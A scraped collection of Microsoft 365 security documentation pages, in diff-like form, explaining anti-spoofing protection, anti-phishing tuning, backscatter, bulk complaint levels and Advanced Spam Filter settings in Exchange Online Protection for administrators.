--- For end users: [Protect yourself from phishing schemes and other forms of online fraud](https://support.microsoft.com/office/be0de46a-29cd-4c59-aaaf-136cf177d593).-- [How Microsoft 365 validates the From address to prevent phishing](anti-phishing-from-email-address-validation.md).
security Anti Phishing Protection Spoofing About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-protection-spoofing-about.md
- Title: Anti-spoofing protection
- - NOCSH
----
- - MET150
-
- - m365-security
- - Strat_O365_IP
- - m365initiative-defender-office365
- - EngageScoreSep2022
- - ContentEngagementFY23
- - tier2
-
- - TopSMBIssues
- - seo-marvel-apr2020
-description: Admins can learn about the anti-spoofing features that are available in Exchange Online Protection (EOP), which can help mitigate against phishing attacks from spoofed senders and domains.
- Previously updated : 3/7/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-spoofing protection in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, EOP includes features to help protect your organization from spoofed (forged) senders.
-
-When it comes to protecting its users, Microsoft takes the threat of phishing seriously. Spoofing is a common technique that's used by attackers. **Spoofed messages appear to originate from someone or somewhere other than the actual source**. This technique is often used in phishing campaigns that are designed to get user credentials. The anti-spoofing technology in EOP specifically examines forgery of the From header in the message body, because that header value is the message sender that's shown in email clients. When EOP has high confidence that the From header is forged, the message is identified as spoofed.
-
-The following anti-spoofing technologies are available in EOP:
--- **Email authentication**: An integral part of any anti-spoofing effort is the use of email authentication (also known as email validation) by SPF, DKIM, and DMARC records in DNS. You can configure these records for your domains so destination email systems can check the validity of messages that claim to be from senders in your domains. For inbound messages, Microsoft 365 requires email authentication for sender domains. For more information, see [Email authentication in Microsoft 365](email-authentication-about.md).-
- EOP analyzes and blocks messages based on the combination of standard email authentication methods and sender reputation techniques.
-
- :::image type="content" source="../../media/eop-anti-spoofing-protection.png" alt-text="The EOP anti-spoofing checks" lightbox="../../media/eop-anti-spoofing-protection.png":::
--- **Spoof intelligence insight**: Review detected spoofed messages from senders in internal and external domains during the last seven days. For more information, see [Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md).--- **Allow or block spoofed senders in the Tenant Allow/Block List**: When you override the verdict in the spoof intelligence insight, the spoofed sender becomes a manual allow or block entry that only appears on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>. You can also manually create allow or block entries for spoof senders before they're detected by spoof intelligence. For more information, see [Spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#spoofed-senders-in-the-tenant-allowblock-list).--- **Anti-phishing policies**: In EOP and Microsoft Defender for Office 365, anti-phishing policies contain the following anti-spoofing settings:
- - Turn spoof intelligence on or off.
- - Turn unauthenticated sender indicators in Outlook on or off.
- - Specify the action for blocked spoofed senders.
-
- For more information, see [Spoof settings in anti-phishing policies](anti-phishing-policies-about.md#spoof-settings).
-
- Anti-phishing policies in Defender for Office 365 contain addition protections, including *impersonation* protection. For more information, see [Exclusive settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#exclusive-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
--- **Spoof detections report**: For more information, see [Spoof Detections report](reports-email-security.md#spoof-detections-report).-
- Defender for Office 365 organizations can also use Real-time detections (Plan 1) or Threat Explorer (Plan 2) to view information about phishing attempts. For more information, see [Microsoft 365 threat investigation and response](office-365-ti.md).
-
-> [!TIP]
-> It's important to understand that a [composite authentication](email-authentication-about.md#composite-authentication) failure doesn't directly result in a message being blocked. Our system using a holistic evaluation strategy that considers the overall suspicious nature of a message along with composite authentication results. This method is designed to mitigate the risk of incorrectly blocking legitimate email from domains that might not strictly adhere to email authentication protocols. This balanced approach helps distinguish genuinely malicious email from message senders that simply fail to conform to standard email authentication practices.
-
-## How spoofing is used in phishing attacks
-
-Spoofed senders in messages have the following negative implications for users:
--- **Deception**: Messages from spoofed senders might trick the recipient into selecting a link and giving up their credentials, downloading malware, or replying to a message with sensitive content (known as business email compromise or BEC).-
- The following message is an example of phishing that uses the spoofed sender msoutlook94@service.outlook.com:
-
- :::image type="content" source="../../media/1a441f21-8ef7-41c7-90c0-847272dc5350.jpg" alt-text="Phishing message impersonating service.outlook.com." lightbox="../../media/1a441f21-8ef7-41c7-90c0-847272dc5350.jpg":::
-
- This message didn't come from service.outlook.com, but the attacker spoofed the **From** header field to make it look like it did. The sender attempted to trick the recipient into selecting the **change your password** link and providing their credentials.
-
- The following message is an example of BEC that uses the spoofed email domain contoso.com:
-
- :::image type="content" source="../../media/da15adaa-708b-4e73-8165-482fc9182090.jpg" alt-text="Phishing message - business email compromise." lightbox="../../media/da15adaa-708b-4e73-8165-482fc9182090.jpg":::
-
- The message looks legitimate, but the sender is spoofed.
--- **Confusion**: Even users who know about phishing might have difficulty seeing the differences between real messages and messages from spoofed senders.-
- The following message is an example of a real password reset message from the Microsoft Security account:
-
- :::image type="content" source="../../media/58a3154f-e83d-4f86-bcfe-ae9e8c87bd37.jpg" alt-text="Microsoft legitimate password reset." lightbox="../../media/58a3154f-e83d-4f86-bcfe-ae9e8c87bd37.jpg":::
-
- The message really did come from Microsoft, but users have been conditioned to be suspicious. Because it's difficult to the difference between a real password reset message and a fake one, users might ignore the message, report it as spam, or unnecessarily report the message to Microsoft as phishing.
-
-## Different types of spoofing
-
-Microsoft differentiates between two different types of spoofed senders in messages:
--- **Intra-org spoofing**: Also known as _self-to-self_ spoofing. For example:-
- - The sender and recipient are in the same domain:
- > From: chris@contoso.com <br> To: michelle@contoso.com
-
- - The sender and the recipient are in subdomains of the same domain:
- > From: laura@marketing.fabrikam.com <br> To: julia@engineering.fabrikam.com
-
- - The sender and recipient are in different domains that belong to the same organization (that is, both domains are configured as [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in the same organization):
- > From: sender @ microsoft.com <br> To: recipient @ bing.com
-
- Spaces are used in the email addresses to prevent spambot harvesting.
-
- Messages that fail [composite authentication](email-authentication-about.md#composite-authentication) due to intra-org spoofing contain the following header values:
-
- `Authentication-Results: ... compauth=fail reason=6xx`
-
- `X-Forefront-Antispam-Report: ...CAT:SPOOF;...SFTY:9.11`
-
- - `reason=6xx` indicates intra-org spoofing.
-
- - `SFTY` is the safety level of the message. `9` indicates phishing, `.11` indicates intra-org spoofing.
--- **Cross-domain spoofing**: The sender and recipient domains are different, and have no relationship to each other (also known as external domains). For example:
- > From: chris@contoso.com <br> To: michelle@tailspintoys.com
-
- Messages that fail [composite authentication](email-authentication-about.md#composite-authentication) due to cross-domain spoofing contain the following headers values:
-
- `Authentication-Results: ... compauth=fail reason=000/001`
-
- `X-Forefront-Antispam-Report: ...CAT:SPOOF;...SFTY:9.22`
-
- - `reason=000` indicates the message failed explicit email authentication. `reason=001` indicates the message failed implicit email authentication.
-
- - `SFTY` is the safety level of the message. `9` indicates phishing, `.22` indicates cross-domain spoofing.
-
- For more information about **Authentication-Results** and `compauth` values, see [Authentication-results message header fields](message-headers-eop-mdo.md#authentication-results-message-header-fields).
-
-## Problems with anti-spoofing protection
-
-Mailing lists (also known as discussion lists) are known to have problems with anti-spoofing protection due to the way they forward and modify messages.
-
-For example, Gabriela Laureano (glaureano@contoso.com) is interested in bird watching, joins the mailing list birdwatchers@fabrikam.com, and sends the following message to the list:
-
-> **From:** "Gabriela Laureano" \<glaureano@contoso.com\> <br> **To:** Birdwatcher's Discussion List \<birdwatchers@fabrikam.com\> <br> **Subject:** Great viewing of blue jays at the top of Mt. Rainier this week <p> Anyone want to check out the viewing this week from Mt. Rainier?
-
-The mailing list server receives the message, modifies its content, and replays it to the members of list. The replayed message has the same From address (glaureano@contoso.com), but a tag is added to the subject line, and a footer is added to the bottom of the message. This type of modification is common in mailing lists, and may result in false positives for spoofing.
-
-> **From:** "Gabriela Laureano" \<glaureano@contoso.com\> <br> **To:** Birdwatcher's Discussion List \<birdwatchers@fabrikam.com\> <br> **Subject:** [BIRDWATCHERS] Great viewing of blue jays at the top of Mt. Rainier this week <p> Anyone want to check out the viewing this week from Mt. Rainier? <p> This message was sent to the Birdwatchers Discussion List. You can unsubscribe at any time.
-
-To help mailing list messages pass anti-spoofing checks, do following steps based on whether you control the mailing list:
--- **Your organization owns the mailing list**:
- - Check the FAQ at DMARC.org: [I operate a mailing list and I want to interoperate with DMARC, what should I do?](https://dmarc.org/wiki/FAQ#I_operate_a_mailing_list_and_I_want_to_interoperate_with_DMARC.2C_what_should_I_do.3F).
- - Read the instructions at this blog post: [A tip for mailing list operators to interoperate with DMARC to avoid failures](/archive/blogs/tzink/a-tip-for-mailing-list-operators-to-interoperate-with-dmarc-to-avoid-failures).
- - Consider installing updates on your mailing list server to support ARC. For more information, see <http://arc-spec.org>.
--- **Your organization doesn't own the mailing list**:
- - Ask the maintainer of the mailing list to configure email authentication for the domain that the mailing list is relaying from. The owners are more likely to act if enough members ask them to set up email authentication. While Microsoft also works with domain owners to publish the required records, it helps even more when individual users request it.
- - Create Inbox rules in your email client to move messages to the Inbox.
- - Use the Tenant Allow/Block List to create an allow entry for the mailing list to treat it as legitimate. For more information, see [Create allow entries for spoofed senders](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-spoofed-senders).
-
-If all else fails, you can report the message as a false positive to Microsoft. For more information, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-## Considerations for anti-spoofing protection
-
-If you're an admin who currently sends messages to Microsoft 365, you need to ensure that your email is properly authenticated. Otherwise, it might be marked as spam or phishing. For more information, see [How to avoid email authentication failures when sending mail to Microsoft 365](email-authentication-about.md#how-to-avoid-email-authentication-failures-when-sending-mail-to-microsoft-365).
-
-Senders in individual user (or admin) Safe Senders lists bypass parts of the filtering stack, including spoof protection. For more information, see [Outlook Safe Senders](create-safe-sender-lists-in-office-365.md#use-outlook-safe-senders).
-
-If at all possible, admins should avoid using allowed sender lists or allowed domain lists in anti-spam policies. These senders bypass most of the filtering stack (high confidence phishing and malware messages are always quarantined). For more information, see [Use allowed sender lists or allowed domain lists](create-safe-sender-lists-in-office-365.md#use-allowed-sender-lists-or-allowed-domain-lists).
security Anti Phishing Protection Tuning https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-protection-tuning.md
- Title: Tune anti-phishing protection
- - NOCSH
-----
- - m365-security
- - tier2
- - MET150
-description: Admins can learn to identify the reasons why and how a phishing message got through in Microsoft 365, and what to do to prevent more phishing messages in the future.
- Previously updated : 06/09/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Tune anti-phishing protection
-
-Although Microsoft 365 comes with a variety of anti-phishing features that are enabled by default, it's possible that some phishing messages could still get through to mailboxes in your organization. This article describes what you can do to discover why a phishing message got through, and what you can do to adjust the anti-phishing settings in your Microsoft 365 organization _without accidentally making things worse_.
-
-## First things first: deal with any compromised accounts and make sure you block any more phishing messages from getting through
-
-If a recipient's account was compromised as a result of the phishing message, follow the steps in [Responding to a compromised email account in Microsoft 365](responding-to-a-compromised-email-account.md).
-
-If your subscription includes Microsoft Defender for Office 365, you can use [Office 365 Threat Intelligence](office-365-ti.md) to identify other users who also received the phishing message. You have additional options to block phishing messages:
--- [Safe Links in Microsoft Defender for Office 365](safe-links-policies-configure.md)-- [Safe Attachments in Microsoft Defender for Office 365](safe-attachments-policies-configure.md)-- [Anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md). You can temporarily increase the **Advanced phishing thresholds** in the policy from **Standard** to **Aggressive**, **More aggressive**, or **Most aggressive**.-
-Verify these policies are working. Safe Links and Safe Attachments protection is turned on by default, thanks to Built-in protection in [preset security policies](preset-security-policies.md). Anti-phishing has a default policy that applies to all recipients where anti-spoofing protection is turned on by default. Impersonation protection isn't turned on in the policy, and therefore needs to be configured. For instructions, see [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-## Report the phishing message to Microsoft
-
-Reporting phishing messages is helpful in tuning the filters that are used to protect all customers in Microsoft 365. For instructions, see [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md).
-
-## Inspect the message headers
-
-You can examine the headers of the phishing message to see if there's anything that you can do yourself to prevent more phishing messages from coming through. In other words, examining the messages headers can help you identify any settings in your organization that were responsible for allowing the phishing messages in.
-
-Specifically, you should check the **X-Forefront-Antispam-Report** header field in the message headers for indications of skipped filtering for spam or phishing in the Spam Filtering Verdict (SFV) value. Messages that skip filtering have an entry of `SCL:-1`, which means one of your settings allowed this message through by overriding the spam or phishing verdicts that were determined by the service. For more information on how to get message headers and the complete list of all available anti-spam and anti-phishing message headers, see [Anti-spam message headers in Microsoft 365](message-headers-eop-mdo.md).
-
-> [!TIP]
-> You can copy and paste the contents of a message header into the [Message Header Analyzer](https://mha.azurewebsites.net/) tool. This tool helps parse headers and put them into a more readable format.
-
-You can also use the [configuration analyzer](configuration-analyzer-for-security-policies.md) to compare your EOP and Defender for Office 365 security policies to the Standard and Strict recommendations.
-
-## Best practices to stay protected
--- On a monthly basis, run [Secure Score](../defender/microsoft-secure-score.md) to assess your organization's security settings.--- For messages that end up in quarantine by mistake (false positives), or for messages that are allowed through (false negatives), we recommend that you search for those messages in [Threat Explorer and real-time detections](threat-explorer-real-time-detections-about.md). You can search by sender, recipient, or message ID. After you locate the message, go to details by clicking on the subject. For a quarantined message, look to see what the "detection technology" was so that you can use the appropriate method to override. For an allowed message, look to see which policy allowed the message.--- Email from spoofed senders (the From address of the message doesn't match the source of the message) is classified as _phishing_ in Defender for Office 365. Sometimes spoofing is benign, and sometimes users don't want messages from specific spoofed sender to be quarantined. To minimize the impact to users, periodically review the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md), [entries for spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#use-the-microsoft-defender-portal-to-view-entries-for-spoofed-senders-in-the-tenant-allowblock-list), and the [Spoof detections report](reports-email-security.md#spoof-detections-report). After you review allowed and blocked spoofed senders and make any necessary overrides, you can confidently [configure spoof intelligence in anti-phishing policies](anti-phishing-policies-about.md#spoof-settings) to **Quarantine** suspicious messages instead of delivering them to the user's Junk Email folder.--- In Defender for Office 365, you can also use the **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight> to track user impersonation or domain impersonation detections. For more information, see [Impersonation insight in Defender for Office 365](anti-phishing-mdo-impersonation-insight.md).--- Periodically review the [Threat Protection Status report](reports-defender-for-office-365.md#threat-protection-status-report) for phishing detections.--- Some customers inadvertently allow phishing messages through by putting their own domains in the Allow sender or Allow domain list in anti-spam policies. Although this configuration allows some legitimate messages through, it also allows malicious messages that would normally be blocked by the spam and/or phishing filters. Instead of allowing the domain, you should correct the underlying problem.-
- The best way to deal with legitimate messages that are blocked by Microsoft 365 (false positives) that involve senders in your domain is to fully and completely configure the SPF, DKIM, and DMARC records in DNS for _all_ of your email domains:
-
- - Verify that your SPF record identifies _all_ sources of email for senders in your domain (don't forget third-party services!).
-
- - Use hard fail (\-all) to ensure that unauthorized senders are rejected by email systems that are configured to do so. You can use the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) to help identify senders that are using your domain so that you can include authorized third-party senders in your SPF record.
-
- For configuration instructions, see:
-
- - [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md)
- - [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md)
- - [Use DMARC to validate email](email-authentication-dmarc-configure.md)
--- Whenever possible, we recommend that you deliver email for your domain directly to Microsoft 365. In other words, point your Microsoft 365 domain's MX record to Microsoft 365. Exchange Online Protection (EOP) is able to provide the best protection for your cloud users when their mail is delivered directly to Microsoft 365. If you must use a third-party email hygiene system in front of EOP, use Enhanced Filtering for Connectors. For instructions, see [Enhanced Filtering for Connectors in Exchange Online](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors).--- Have users use the [built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web) or deploy the [Microsoft Report Message or Report Phishing add-ins](submissions-outlook-report-messages.md#use-the-report-message-and-report-phishing-add-ins-in-outlook) in your organization. Configure the [user reported settings](submissions-user-reported-messages-custom-mailbox.md) to send user reported messages to a reporting mailbox, to Microsoft, or both. User reported messages are then available to admins on the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>. Admin can report user reported messages or any messages to Microsoft as described in [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md). User or admin reporting of false positives or false negatives to Microsoft is important, because it helps train our detection systems.--- Multi factor authentication (MFA) is a good way to prevent compromised accounts. You should strongly consider enabling MFA for all of your users. For a phased approach, start by enabling MFA for your most sensitive users (admins, executives, etc.) before you enable MFA for everyone. For instructions, see [Set up multi-factor authentication](/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication).--- Forwarding rules to external recipients are often used by attackers to extract data. Use the **Review mailbox forwarding rules** information in [Microsoft Secure Score](../defender/microsoft-secure-score.md) to find and even prevent forwarding rules to external recipients. For more information, see [Mitigating Client External Forwarding Rules with Secure Score](/archive/blogs/office365security/mitigating-client-external-forwarding-rules-with-secure-score).-
- Use the [Autoforwarded messages report](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report) to view specific details about forwarded email.
security Anti Spam Backscatter About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-backscatter-about.md
- Title: Backscatter in EOP
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: In this article, admins can about backscatter and how Microsoft Exchange Online Protection (EOP) tries to prevent it.
- Previously updated : 6/22/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Backscatter in EOP
-
-*Backscatter* is non-delivery reports (also known as NDRs or bounce messages) that you receive for messages that you didn't send. Spammers often use real email addresses as the From address to lend credibility to their messages. When a nonexistent recipient receives spam, the destination email server unwittingly sends the NDR to the forged sender in the From address.
-
-Exchange Online Protection (EOP) makes every effort to identify and silently drop messages from dubious sources without generating an NDR. But, it's almost impossible for EOP to send absolutely no backscatter, based on the sheer volume email flowing through the service.
-
-Backscatterer.org maintains a blocklist (also known as a DNS blocklist or DNSBL) of email servers that were responsible for sending backscatter. Their blocklist isn't a list of spammers, and EOP servers might appear on their list.
-
-> [!TIP]
-> The Backscatterer.org website (<http://www.backscatterer.org/?target=usage>) recommends using their service in Safe mode as large email services almost always send some backscatter.
->
-> The Advanced Spam Filter (ASF) in anti-spam policies has a setting to mark backscatter as spam, but this setting isn't required in most environments. For more information, see [ASF 'mark as spam' settings](anti-spam-policies-asf-settings-about.md#mark-as-spam-settings).
security Anti Spam Bulk Complaint Level Bcl About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-bulk-complaint-level-bcl-about.md
- Title: Bulk complaint level values
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn about bulk complaint level (BCL) values that are used in Exchange Online Protection (EOP).
- Previously updated : 10/17/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Bulk complaint level (BCL) in EOP
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, EOP assigns a bulk complaint level (BCL) value to inbound messages from bulk senders. The BCL value is added to the message in an X-header and is similar to the [spam confidence level (SCL)](anti-spam-spam-confidence-level-scl-about.md) that's used to identify messages as spam. A higher BCL value indicates a bulk message is more likely to exhibit undesirable spam-like behavior. Microsoft uses both internal and third party sources to identify bulk mail and determine the appropriate BCL value.
-
-Bulk senders vary in their sending patterns, content creation, and recipient acquisition practices. Good bulk senders send desired messages with relevant content to their subscribers. These messages generate few complaints from recipients. Other bulk senders send unsolicited messages that closely resemble spam and generate many complaints from recipients. Messages from a bulk sender are known as bulk mail or gray mail.
-
-Spam filtering marks messages as **Bulk email** based on the BCL threshold (the default value or a value you specify) and takes the specified action on the message. For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md) and [What's the difference between junk email and bulk email?](anti-spam-spam-vs-bulk-about.md)
-
-The BCL thresholds are described in the following table.
-
-|BCL|Description|
-|::||
-|0|The message isn't from a bulk sender.|
-|1, 2, 3|The message is from a bulk sender that generates few complaints.|
-|4, 5, 6, 7|The message is from a bulk sender that generates a mixed number of complaints.|
-|8, 9|The message is from a bulk sender that generates a high number of complaints.|
-
-The default BCL threshold that's used in anti-spam policies is described in the following list:
--- **Default anti-spam policy and new anti-spam policies**: 7.-- **[Standard preset security policy](preset-security-policies.md)**: 6.-- **Strict preset security policy**: 5.-
-Messages that meet or exceed the configured BCL threshold have the following default actions taken on them:
--- **Default anti-spam policy, new anti-spam policies, and Standard preset security policy**: Deliver the message to recipient Junk Email folders.-- **Strict preset security policy**: [Quarantine the message](quarantine-end-user.md).-
-The [View data by Email \> Spam and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--spam-and-chart-breakdown-by-detection-technology) view in the Threat protection status report has a **Bulk complaint level** slider. This slider is available in :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** when you also select the **Detection** value **Bulk**. Using this slider shows you the results of increasing or decreasing the BCL value in the report.
security Anti Spam Policies Asf Settings About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-policies-asf-settings-about.md
- Title: ASF settings in EOP
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the Advanced Spam Filter (ASF) settings that are available in anti-spam policies in Exchange Online Protection (EOP).
- Previously updated : 06/09/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Advanced Spam Filter (ASF) settings in EOP
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, Advanced Spam Filter (ASF) settings in anti-spam policies allow admins to mark messages as spam based on specific message properties. ASF specifically targets these properties because they're commonly found in spam. Depending on the property, ASF detections mark the message as **Spam** or **High confidence spam**.
-
-> [!NOTE]
-> Enabling one or more of the ASF settings is an aggressive approach to spam filtering. You can't report messages that are filtered by ASF as false positives to Microsoft. You can identify messages that were filtered by ASF by:
->
-> - Periodic quarantine notifications from spam and high confidence spam filter verdicts.
-> - The presence of filtered messages in quarantine.
-> - The specific `X-CustomSpam:` X-header fields that are added to messages as described in this article.
->
-> ASF adds `X-CustomSpam:` X-header fields to messages _after_ the messages have been processed by Exchange mail flow rules (also known as transport rules), so you can't use mail flow rules to identify and act on messages that were filtered by ASF. You can use [Inbox rules](https://support.microsoft.com/office/8400435c-f14e-4272-9004-1548bb1848f2) in mailboxes to affect the delivery of the message.
-
-The following sections describe the ASF settings and options that are available in anti-spam policies in the Microsoft Defender portal, and in Exchange Online PowerShell or standalone EOP PowerShell ([New-HostedContentFilterPolicy](/powershell/module/exchange/new-hostedcontentfilterpolicy) and [Set-HostedContentFilterPolicy](/powershell/module/exchange/set-hostedcontentfilterpolicy)). For more information, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).
-
-## Enable, disable, or test ASF settings
-
-For each ASF setting, the following options are available in anti-spam policies:
--- **On**: ASF adds the corresponding X-header field to the message, and marks the message as **Spam** (SCL 5 or 6 for [Increase spam score settings](#increase-spam-score-settings)) or **High confidence spam** (SCL 9 for [Mark as spam settings](#mark-as-spam-settings)).-- **Off**: The ASF setting is disabled. This is the default value.-- **Test**: The ASF setting is in Test Mode. What happens to the message is determined by the **Test mode** (_TestModeAction_) value:
- - **None**: Message delivery is unaffected by the ASF detection. The message is still subject to other types of filtering and rules in EOP and Defender for Office 365.
- - **Add default X-header text (_AddXHeader_)**: The X-header value `X-CustomSpam: This message was filtered by the custom spam filter option` is added to the message. You can use this value in Inbox rules (not mail flow rules) to affect the delivery of the message.
- - **Send Bcc message (_BccMessage_)**: The specified email addresses (the _TestModeBccToRecipients_ parameter value in PowerShell) are added to the Bcc field of the message, and the message is delivered to the additional Bcc recipients. In the Microsoft Defender portal, you separate multiple email addresses by semicolons (;). In PowerShell, you separate multiple email addresses by commas.
-
- - Test mode isn't available for the following ASF settings:
- - **Conditional Sender ID filtering: hard fail** (_MarkAsSpamFromAddressAuthFail_)
- - **NDR backscatter**(_MarkAsSpamNdrBackscatter_)
- - **SPF record: hard fail** (_MarkAsSpamSpfRecordHardFail_)
- - The same test mode action is applied to _all_ ASF settings that are set to **Test**. You can't configure different test mode actions for different ASF settings.
-
-## Increase spam score settings
-
-The following **Increase spam score** ASF settings result in an increase in spam score and therefore a higher chance of getting marked as spam with a spam confidence level (SCL) of 5 or 6, which corresponds to a **Spam** filter verdict and the corresponding action in anti-spam policies. Not every message that matches the following ASF conditions is marked as spam.
-
-|Anti-spam policy setting|Description|X-header added|
-||||
-|**Image links to remote websites** (_IncreaseScoreWithImageLinks_)|Messages that contain `<Img>` HTML tag links to remote sites (for example, using http) are marked as spam.|`X-CustomSpam: Image links to remote sites`|
-|**Numeric IP address in URL** (_IncreaseScoreWithNumericIps_)|Messages that contain numeric-based URLs (typically, IP addresses) are marked as spam.|`X-CustomSpam: Numeric IP in URL`|
-|**URL redirect to other port** (_IncreaseScoreWithRedirectToOtherPort_)|Messages that contain hyperlinks that redirect to TCP ports other than 80 (HTTP), 8080 (alternate HTTP), or 443 (HTTPS) are marked as spam.|`X-CustomSpam: URL redirect to other port`|
-|**Links to .biz or .info websites** (_IncreaseScoreWithBizOrInfoUrls_)|Messages that contain `.biz` or `.info` links in the body of the message are marked as spam.|`X-CustomSpam: URL to .biz or .info websites`|
-
-## Mark as spam settings
-
-The following **Mark as spam** ASF settings set the SCL of detected messages to 9, which corresponds to a **High confidence spam** filter verdict and the corresponding action in anti-spam policies.
-
-|Anti-spam policy setting|Description|X-header added|
-||||
-|**Empty messages** (_MarkAsSpamEmptyMessages_)|Messages with no subject, no content in the message body, and no attachments are marked as high confidence spam.|`X-CustomSpam: Empty Message`|
-|**Embedded tags in HTML** (_MarkAsSpamEmbedTagsInHtml_)|Messages that contain `<embed>` HTML tags are marked as high confidence spam. <br><br> This tag allows the embedding of different kinds of documents in an HTML document (for example, sounds, videos, or pictures).|`X-CustomSpam: Embed tag in html`|
-|**JavaScript or VBScript in HTML** (_MarkAsSpamJavaScriptInHtml_)|Messages that use JavaScript or Visual Basic Script Edition in HTML are marked as high confidence spam. <br><br> These scripting languages are used in email messages to cause specific actions to automatically occur.|`X-CustomSpam: Javascript or VBscript tags in HTML`|
-|**Form tags in HTML** (_MarkAsSpamFormTagsInHtml_)|Messages that contain `<form>` HTML tags are marked as high confidence spam. <br><br> This tag is used to create website forms. Email advertisements often include this tag to solicit information from the recipient.|`X-CustomSpam: Form tag in html`|
-|**Frame or iframe tags in HTML** (_MarkAsSpamFramesInHtml_)|Messages that contain `<frame>` or `<iframe>` HTML tags are marked as high confidence spam. <br><br> These tags are used in email messages to format the page for displaying text or graphics.|`X-CustomSpam: IFRAME or FRAME in HTML`|
-|**Web bugs in HTML** (_MarkAsSpamWebBugsInHtml_)|A _web bug_ (also known as a _web beacon_) is a graphic element (often as small as one pixel by one pixel) that's used in email messages to determine whether the recipient read the message. <br><br> Messages that contain web bugs are marked as high confidence spam. <br><br> Legitimate newsletters might use web bugs, although many consider this an invasion of privacy. |`X-CustomSpam: Web bug`|
